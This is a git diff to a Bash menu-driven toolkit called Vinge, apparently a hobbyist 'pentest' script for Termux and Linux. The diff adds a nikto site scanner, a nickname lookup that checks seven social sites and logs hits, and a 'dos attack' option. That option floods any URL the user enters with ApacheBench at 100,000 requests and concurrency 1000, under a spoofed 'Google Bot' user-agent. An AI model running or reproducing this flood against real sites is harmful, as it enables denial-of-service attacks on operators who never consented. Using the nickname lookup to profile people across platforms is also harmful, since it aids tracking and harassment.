test

diff --git a/Vinge b/Vinge
--- a/Vinge
+++ b/Vinge
@@ -6,11 +6,6 @@
 chmod -R a+rx *;
 number='^[0-9]+$';
 
-installing()
-{
-echo
-}
-
 
 banner()
 {
@@ -52,6 +47,48 @@ echo -en "\e[1;30mpress any key: \e[0m";
     case $choice in
 "") $1; ;;
 *) $1; ;;
+    esac;
+}
+
+
+installing()
+{
+#installing dependencies
+#termux
+  if [[ -d /data/data/com.termux/files/usr/bin ]]; then
+os="termux";
+    if [[ ! -f /data/data/com.termux/files/usr/bin/exiftool ]]; then
+pkg install exiftool -y;
+    fi
+      if [[ ! -f /data/data/com.termux/files/usr/bin/ccrypt ]]; then
+pkg install ccrypt -y;
+      fi;
+        if [[ ! -f /data/data/com.termux/files/usr/bin/perl ]]; then
+pkg install perl -y;
+        fi;
+#linux
+  else
+os="linux";
+    if [[ ! -f /usr/bin/exiftool ]]; then
+apt install exiftool -y;
+    fi;
+      if [[ ! -f /usr/bin/ccrypt ]]; then
+apt install ccrypt -y;
+      fi;
+        if [[ ! -f /usr/bin/nikto ]]; then
+apt install nikto -y;
+        fi;
+  fi;
+shyno;
+}
+
+
+internetChecking()
+{
+ping -c 1 google.com | grep "ping" > /dev/null;
+    case $? in
+0) $1; ;;
+*) banner; echo -e "\e[1;30mInternet not available\e[0m"; sleep 1; $2; ;;
     esac;
 }
 
@@ -142,10 +179,82 @@ input;
 }
 
 
+dosAttack()
+{
+banner;
+backOrExit;
+echo -e "\e[1;30mdos attack\e[0m";
+echo "";
+echo -en "\e[1;37mEnter the URL of site: \e[0m";
+ read url
+#checking url and "/" sign
+    if [[ $url == "" || $url == $number ]]; then
+error; dosAttack
+    elif [[ $url == "b" ]]; then
+pentest;
+    elif [[ $url == "x" ]]; then
+echo ""; exit 0;
+    else
+#dos
+banner;
+echo -e "\e[1;30mFor stopping: CTRL+C\e[0m";
+echo "";
+  if [[ "${url:${#url}-1}" == "/" ]]; then
+ab -n 100000 -c 1000 -k -r -H "User-Agent: Google Bot", "$url";
+  else
+ab -n 100000 -c 1000 -k -r -H "User-Agent: Google Bot", "$url"/;
+  fi;
+    fi;
+pentest;
+}
+
+
+nickExist()
+{
+link=$(curl -s -i "https://$url$nick" -H "Accept-Language: en" -L | grep -o "$siteError"; echo $?);
+  case $link in
+*'1'*) echo -e "\e[1;30m$siteName:\e[0m" "\e[1;37mhttps://$url$nick\e[0m";
+echo "$siteName:" "https://$url$nick" >> data/log/searchByNick/searchByNick.md; ;;
+*'0'*) echo -e "\e[1;30m$siteName:\e[0m" "\e[37mnot found\e[0m";
+echo "$siteName:" "not found" >> data/log/searchByNick/searchByNick.md; ;;
+  esac;
+}
+
+
 searchByNick()
 {
 banner;
 backOrExit;
+echo -e "\e[1;30msearch by nick\e[0m";
+echo "";
+echo -en "\e[37mEnter nick: \e[0m";
+ read nick
+  case $nick in
+"b") pentest; ;;
+"x") echo ""; exit 0; ;;
+"") error; searchByNick; ;;
+*) echo "";
+echo "" >> data/log/searchByNick/searchByNick.md;
+echo "" >> data/log/searchByNick/searchByNick.md;
+#vk
+siteName="vk"; url="vk.com/"; siteError='HTTP/2 404'; nickExist;
+#facebook
+siteName="facebook"; url="www.facebook.com/"; siteError='not found'; nickExist;
+#youtube
+siteName="youtube"; url="www.youtube.com/"; siteError='Not Found'; nickExist;
+#steam
+siteName="steam"; url="steamcommunity.com/id/";
+siteError='The specified profile could not be found'; nickExist;
+#ebay
+siteName="ebay"; url="www.ebay.com/usr/";
+siteError='HTTP/2 404\|404 Not Found\|eBay Profile - error';nickExist;
+#spotify
+siteName="spotify"; url="open.spotify.com/user/"; siteError='HTTP/2 404'; nickExist;
+#hackerNews
+siteName="hackerNews"; url="news.ycombinator.com/user?id=";
+siteError='No such user'; nickExist; ;;
+  esac;
+anyKey pentest;
 }
 
 
@@ -179,6 +288,41 @@ siteInfo()
 {
 banner;
 backOrExit;
+echo -e "\e[1;30msite info\e[0m";
+echo "";
+echo -en "\e[37mEnter the URL: \e[0m";
+ read url
+echo "";
+  if [[ $url == "x" ]]; then
+echo ""; exit 0;
+  elif [[ $url == "b" ]]; then
+pentest;
+  elif [[ $url =~ $number ]]; then
+error; siteInfo;
+  elif [[ $url == "" ]]; then
+error; siteInfo;
+  else
+urlChecking=$( curl -Is $url | head -1; echo $? );
+    case $urlChecking in
+"") banner;
+echo -e "\e[1;30m$url\e[0m" "\e[1;37msite doesn't exist\e[0m";
+anyKey siteInfo; ;;
+*) #scanning
+      case $os in
+"linux")
+echo "" >> data/log/siteInfo/siteInfo.md;
+echo "" >> data/log/siteInfo/siteInfo.md;
+nikto -h $url | tee -a data/log/siteInfo/siteInfo.md;
+anyKey pentest; ;;
+"termux")
+echo "" >> data/log/siteInfo/siteInfo.md;
+echo "" >> data/log/siteInfo/siteInfo.md;
+perl data/lib/siteInfo/nikto.pl -h $url | tee -a data/log/siteInfo/siteInfo.md;
+anyKey pentest; ;;
+      esac;
+    esac;
+  fi;
+
 }
 
 
@@ -194,14 +338,17 @@ echo -e "\e[1;30m / \e[0m""\e[37mmetadata\e[0m";
 echo -en "\e[1;30m/ \e[0m""\e[37m3\e[0m"
 echo -e "\e[1;30m / \e[0m""\e[37msearch by nick\e[0m";
 echo -en "\e[1;30m/ \e[0m""\e[37m4\e[0m"
+echo -e "\e[1;30m / \e[0m""\e[37mdos attack\e[0m";
+echo -en "\e[1;30m/ \e[0m""\e[37m5\e[0m"
 echo -e "\e[1;30m / \e[0m""\e[37mencrypt file\e[0m";
 input;
  read choice
   case $choice in
-1) siteInfo; ;;
+1) internetChecking siteInfo pentest; ;;
 2) metadata; ;;
-3) searchByNick; ;;
-4) encryptOrDecryptFile; ;;
+3) internetChecking searchByNick pentest; ;;
+4) internetChecking dosAttack pentest; ;;
+5) encryptOrDecryptFile; ;;
 "b") shyno; ;;
 "x") echo ""; exit 0; ;;
 *) error; pentest; ;;
@@ -225,6 +372,8 @@ echo "";
 echo -e "\e[37m1.site info\e[0m";
 echo -e "\e[37m2.metadata\e[0m";
 echo -e "\e[37m3.search by nick\e[0m";
+echo "";
+echo -e "\e[37m0.all\e[0m";
 input
  read choice
   case $choice in
@@ -233,7 +382,11 @@ echo '#site info log' > data/log/siteInfo/siteInfo.md; ;;
 2) logChoice="metadata log";
 echo '#metadata log' > data/log/metadata/metadata.md; ;;
 3) logChoice="search by nick log";
-echo '#search by nick log' >data/log/searchByNick/searchByNick.md; ;;
+echo '#search by nick log' > data/log/searchByNick/searchByNick.md; ;;
+0) logChoice="all log";
+echo '#site info log' > data/log/siteInfo/siteInfo.md;
+echo '#metadata log' > data/log/metadata/metadata.md;
+echo '#search by nick log' > data/log/searchByNick/searchByNick.md; ;;
 "b") log; ;;
 "x") echo ""; exit 0; ;;
 *) error; clearLog; ;;
@@ -309,4 +462,4 @@ input;
 *) error; shyno; ;;
   esac;
 }
-shyno;
+installing;
